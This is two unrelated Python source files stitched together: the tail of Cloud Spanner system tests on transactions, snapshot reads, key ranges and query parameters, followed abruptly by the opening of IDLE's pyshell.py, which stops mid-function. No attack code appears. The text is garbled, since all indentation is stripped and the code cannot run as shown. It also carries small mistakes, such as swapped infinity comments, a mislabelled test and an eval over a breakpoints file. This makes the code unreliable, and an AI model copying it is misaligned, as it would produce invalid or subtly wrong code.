snapshot = session.snapshot(read_timestamp=batch.committed)
rows = list(snapshot.read(
self.ALL_TYPES_TABLE, self.ALL_TYPES_COLUMNS, self.ALL))
self._check_row_data(rows, expected=self.ALL_TYPES_ROWDATA)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
snapshot = session.snapshot(read_timestamp=batch.committed)
rows = list(snapshot.execute_sql(self.SQL))
self._check_row_data(rows)
@RetryErrors(exception=GrpcRendezvous)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=GrpcRendezvous)
def test_transaction_read_and_insert_then_execption(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
session.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=GrpcRendezvous)
def test_transaction_read_and_insert_or_update_then_commit(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(
self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows)
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]])
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_session = self._db.session()
txn_sessions.append(txn_session)
txn_session.create()
self.to_delete.append(txn_session)
threads = [
threading.Thread(
target=txn_session.run_in_transaction,
args=(unit_of_work, pkey))
for txn_session in txn_sessions]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
keyset = KeySet(keys=[(pkey,)])
rows = list(session.read(
COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(
COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
PKEY = 'read_w_concurrent_updates'
self._transaction_concurrency_helper(
self._read_w_concurrent_update, PKEY)
def _query_w_concurrent_update(self, transaction, pkey):
SQL = 'SELECT * FROM counters WHERE name = @name'
rows = list(transaction.execute_sql(
SQL,
params={'name': pkey},
param_types={'name': Type(code=STRING)},
))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
PKEY = 'query_w_concurrent_updates'
self._transaction_concurrency_helper(
self._query_w_concurrent_update, PKEY)
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
trigger = _ReadAbortTrigger()
with session.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE,
COUNTERS_COLUMNS,
[[trigger.KEY1, 0], [trigger.KEY2, 0]])
provoker = threading.Thread(
target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(
target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
rows = list(session.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(
rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield [
index,
'First%09d' % (index,),
'Last%09d' % (max_index - index),
'test-%09d@example.com' % (index,),
]
def _set_up_table(self, row_count, db=None):
if db is None:
db = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(db.reload)()
session = db.session()
session.create()
self.to_delete.append(session)
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(
test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = session.run_in_transaction(_unit_of_work, test=self)
return session, committed
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
ROW_COUNT = 400
session, committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
read_tx = session.snapshot(read_timestamp=committed)
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
min_read_ts = session.snapshot(min_read_timestamp=committed)
rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
max_staleness = session.snapshot(max_staleness=staleness)
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
exact_staleness = session.snapshot(exact_staleness=staleness)
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
strong = session.snapshot()
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
ROW_COUNT = 40
session, committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
strong = session.snapshot(multi_use=True)
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
ROW_COUNT = 40
session, committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
read_ts = session.snapshot(read_timestamp=committed, multi_use=True)
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
ROW_COUNT = 40
session, committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
exact = session.snapshot(exact_staleness=delta, multi_use=True)
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_manual_consume(self):
ROW_COUNT = 4000
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed)
streamed = snapshot.read(self.TABLE, self.COLUMNS, self.ALL)
retrieved = 0
while True:
try:
streamed.consume_next()
except StopIteration:
break
retrieved += len(streamed.rows)
streamed.rows[:] = ()
self.assertEqual(retrieved, ROW_COUNT)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def test_read_w_index(self):
ROW_COUNT = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = [
'CREATE INDEX contacts_by_last_name ON contacts(last_name)',
]
pool = BurstyPool()
temp_db = Config.INSTANCE.database(
'test_read_w_index', ddl_statements=DDL_STATEMENTS + EXTRA_DDL,
pool=pool)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
session, committed = self._set_up_table(ROW_COUNT, db=temp_db)
snapshot = session.snapshot(read_timestamp=committed)
rows = list(snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index='contacts_by_last_name'))
expected = list(reversed(
[(row[0], row[2]) for row in self._row_data(ROW_COUNT)]))
self._check_row_data(rows, expected)
def test_read_w_single_key(self):
ROW_COUNT = 40
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed)
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(ROW_COUNT))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
def test_read_w_multiple_keys(self):
ROW_COUNT = 40
indices = [0, 5, 17]
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed)
rows = list(snapshot.read(
self.TABLE, self.COLUMNS,
KeySet(keys=[(index,) for index in indices])))
all_data_rows = list(self._row_data(ROW_COUNT))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
ROW_COUNT = 4000
LIMIT = 100
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed)
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, self.ALL, limit=LIMIT))
all_data_rows = list(self._row_data(ROW_COUNT))
expected = all_data_rows[:LIMIT]
self._check_row_data(rows, expected)
def test_read_w_ranges(self):
ROW_COUNT = 4000
START = 1000
END = 2000
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed, multi_use=True)
all_data_rows = list(self._row_data(ROW_COUNT))
closed_closed = KeyRange(start_closed=[START], end_closed=[END])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START:END+1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[START], end_open=[END])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START:END]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[START], end_open=[END])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START+1:END]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[START], end_closed=[END])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START+1:END+1]
self._check_row_data(rows, expected)
def test_execute_sql_w_manual_consume(self):
ROW_COUNT = 4000
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed)
streamed = snapshot.execute_sql(self.SQL)
retrieved = 0
while True:
try:
streamed.consume_next()
except StopIteration:
break
retrieved += len(streamed.rows)
streamed.rows[:] = ()
self.assertEqual(retrieved, ROW_COUNT)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(self, snapshot, sql, params, param_types, expected):
if 'ORDER' not in sql:
sql += ' ORDER BY eye_d'
rows = list(snapshot.execute_sql(
sql, params=params, param_types=param_types))
self._check_row_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
ROW_COUNT = 40
SQL = 'SELECT * FROM {}'.format(self.TABLE)
session, committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
strong = session.snapshot(multi_use=True)
before = list(strong.execute_sql(SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
SQL = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
session = self._db.session()
session.create()
self.to_delete.append(session)
snapshot = session.snapshot()
self._check_sql_results(
snapshot,
sql=SQL,
params=None,
param_types=None,
expected=[
[[['a', 1], ['b', 2]]],
])
def test_execute_sql_w_query_param(self):
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.ALL_TYPES_TABLE, self.ALL)
batch.insert(
self.ALL_TYPES_TABLE,
self.ALL_TYPES_COLUMNS,
self.ALL_TYPES_ROWDATA)
snapshot = session.snapshot(
read_timestamp=batch.committed, multi_use=True)
# Cannot equality-test array values. See below for a test w/
# array of IDs.
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE are_you_sure = @sure',
params={'sure': True},
param_types={'sure': Type(code=BOOL)},
expected=[(19,), (99,)],
)
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE raw_data = @bytes_1',
params={'bytes_1': self.BYTES_1},
param_types={'bytes_1': Type(code=BYTES)},
expected=[(19,), (99,)],
)
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE hwhen = @hwhen',
params={'hwhen': self.SOME_DATE},
param_types={'hwhen': Type(code=DATE)},
expected=[(19,)],
)
self._check_sql_results(
snapshot,
sql=('SELECT eye_d FROM all_types WHERE approx_value >= @lower'
' AND approx_value < @upper '),
params={'lower': 0.0, 'upper': 1.0},
param_types={
'lower': Type(code=FLOAT64), 'upper': Type(code=FLOAT64)},
expected=[(None,), (19,)],
)
# Find -inf
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE approx_value = @pos_inf',
params={'pos_inf': float('+inf')},
param_types={'pos_inf': Type(code=FLOAT64)},
expected=[(107,)],
)
# Find +inf
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE approx_value = @neg_inf',
params={'neg_inf': float('-inf')},
param_types={'neg_inf': Type(code=FLOAT64)},
expected=[(207,)],
)
self._check_sql_results(
snapshot,
sql='SELECT description FROM all_types WHERE eye_d = @my_id',
params={'my_id': 19},
param_types={'my_id': Type(code=INT64)},
expected=[(u'dog',)],
)
self._check_sql_results(
snapshot,
sql='SELECT description FROM all_types WHERE eye_d = @my_id',
params={'my_id': None},
param_types={'my_id': Type(code=INT64)},
expected=[],
)
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE description = @description',
params={'description': u'dog'},
param_types={'description': Type(code=STRING)},
expected=[(19,)],
)
# NaNs cannot be searched for by equality.
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE exactly_hwhen = @hwhen',
params={'hwhen': self.SOME_TIME},
param_types={'hwhen': Type(code=TIMESTAMP)},
expected=[(19,)],
)
array_type = Type(code=ARRAY, array_element_type=Type(code=INT64))
self._check_sql_results(
snapshot,
sql=('SELECT description FROM all_types '
'WHERE eye_d in UNNEST(@my_list)'),
params={'my_list': [19, 99]},
param_types={'my_list': array_type},
expected=[(u'dog',), (u'cat',)],
)
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable.")
database = instance.database(DATABASE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable.")
cls._db = database
def _verify_one_column(self, table_desc):
sql = 'SELECT chunk_me FROM {}'.format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = 'SELECT chunk_me, chunk_me_2 FROM {}'.format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = 'key1'
KEY2 = 'key2'
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(
transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(
transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(
transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]])
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
|
pyshell.py | #! /usr/bin/env python3
import sys
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
import tkinter.messagebox as tkMessageBox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
tkMessageBox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import linecache
import os
import os.path
from platform import python_version
import re
import socket
import subprocess
import threading
import time
import tokenize
import warnings
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, PseudoInputFile, PseudoOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
